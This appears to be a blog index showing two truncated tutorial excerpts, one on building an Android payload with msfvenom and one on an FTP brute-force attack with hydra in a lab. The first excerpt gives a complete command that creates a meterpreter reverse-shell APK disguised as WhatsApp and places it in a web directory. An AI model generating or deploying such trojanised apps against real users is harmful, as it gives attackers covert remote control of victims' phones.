Using MSFvenom for generating Whatassp payload

By using MSFvenom, we create a payload .apk file. For this, we use the following command: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.240.161 LPORT=4444 R > /var/www/html/whatsapp.apk -p — Payload to be used LHOST — Localhost IP to receive a back connection (Check yours with ifconfig command) LPORT — Localhost port on which the connection listen for the…

Trying Brute Force using Kali

Loaded Kali Linux on my new Raspberry Pi 4 to start learning some hacking tools. My first brute force(dictionary) attack I decided to try it on lab FTP server. I know the username but I need to get the password for FTP server. I use hydra tool on Kali to crack the password. As I…